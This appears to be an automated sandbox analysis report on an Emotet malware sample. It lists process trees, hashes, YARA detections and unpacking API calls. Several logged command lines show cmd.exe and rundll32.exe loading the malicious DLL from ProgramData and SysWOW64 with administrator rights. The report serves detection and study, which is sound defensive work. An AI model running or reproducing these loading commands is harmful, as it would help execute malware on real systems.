                                                                                                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                    Reputation:high

                                                                                                                    Target ID:8
                                                                                                                    Start time:21:24:34
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                                                                                                                    Imagebase:0x4a860000
                                                                                                                    File size:345088 bytes
                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:9
                                                                                                                    Start time:21:24:34
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:10
                                                                                                                    Start time:21:24:38
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:11
                                                                                                                    Start time:21:25:02
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:12
                                                                                                                    Start time:21:25:06
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high

                                                                                                                    Target ID:14
                                                                                                                    Start time:21:25:28
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                                                                                                    Target ID:15
                                                                                                                    Start time:21:25:33
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Target ID:16
                                                                                                                    Start time:21:25:50
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                    Target ID:17
                                                                                                                    Start time:21:25:55
                                                                                                                    Start date:28/01/2022
                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer
                                                                                                                    Imagebase:0x520000
                                                                                                                    File size:44544 bytes
                                                                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414732609.00000000033A3000.00000010.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                                                                      • Associated: 00000004.00000003.414716936.00000000033A0000.00000010.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_33a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ea209d9432496fc15bbe6e81b256ae7fc659aaf30434b71b91edb859b60d00c1
                                                                                                                      • Instruction ID: 36d81037a0c918aa953a939c86cac6adfacf82f9f2a3bd65559d96b6155daffb
                                                                                                                      • Opcode Fuzzy Hash: ea209d9432496fc15bbe6e81b256ae7fc659aaf30434b71b91edb859b60d00c1
                                                                                                                      • Instruction Fuzzy Hash: F4D0A9255097C40FC302B378044A12CBA518B01288B2800CF84868B182DD0A4D848212
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414732609.00000000033A3000.00000010.00000800.00020000.00000000.sdmp, Offset: 033A3000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_33a0000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ea209d9432496fc15bbe6e81b256ae7fc659aaf30434b71b91edb859b60d00c1
                                                                                                                      • Instruction ID: 36d81037a0c918aa953a939c86cac6adfacf82f9f2a3bd65559d96b6155daffb
                                                                                                                      • Opcode Fuzzy Hash: ea209d9432496fc15bbe6e81b256ae7fc659aaf30434b71b91edb859b60d00c1
                                                                                                                      • Instruction Fuzzy Hash: F4D0A9255097C40FC302B378044A12CBA518B01288B2800CF84868B182DD0A4D848212
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000003.414768676.0000000003110000.00000010.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_3_3110000_mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction ID: f77f007df00a8820ea3485737823876f7db06cf27580ed2ee1c85666360e3226
                                                                                                                      • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.679743362.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      • Opcode ID: 3c68071f839a19810fcab8dfe5bcfc32094b8e701f2bb993a88eeafe49c60160
                                                                                                                      • Instruction ID: 30eaa00d93f0420fc23e5b843629076b272696860e8128162f7039f61d42fa8a
                                                                                                                      • Opcode Fuzzy Hash: 3c68071f839a19810fcab8dfe5bcfc32094b8e701f2bb993a88eeafe49c60160
                                                                                                                      • Instruction Fuzzy Hash: 0D41C06190E7C24FEB57577858AA2607FB0AF17215F5E04EBC088CF0E3E9584C5AC722
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.679743362.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 81ae09296444d8af2a2b1df3c29d15e472083d43b3300ce7dd884d268f09a93d
                                                                                                                      • Instruction ID: f579ef670a995e08645a6d04ebed502a0e09dd24c255dc7594b3f6fbfa795a77
                                                                                                                      • Opcode Fuzzy Hash: 81ae09296444d8af2a2b1df3c29d15e472083d43b3300ce7dd884d268f09a93d
                                                                                                                      • Instruction Fuzzy Hash: DB717961A0EBC60FEB13577858667657FB0AF17215F1E40EBC488CB0E3D958985AC362
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16%
                                                                                                                      Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                      Signature Coverage:19.9%
                                                                                                                      Total number of Nodes:297
                                                                                                                      Total number of Limit Nodes:23

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                      • _printf.LIBCMT ref: 1001265F
                                                                                                                      • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                      • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,-100510D0,00000040), ref: 100127D1
                                                                                                                      • _malloc.LIBCMT ref: 100127F5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
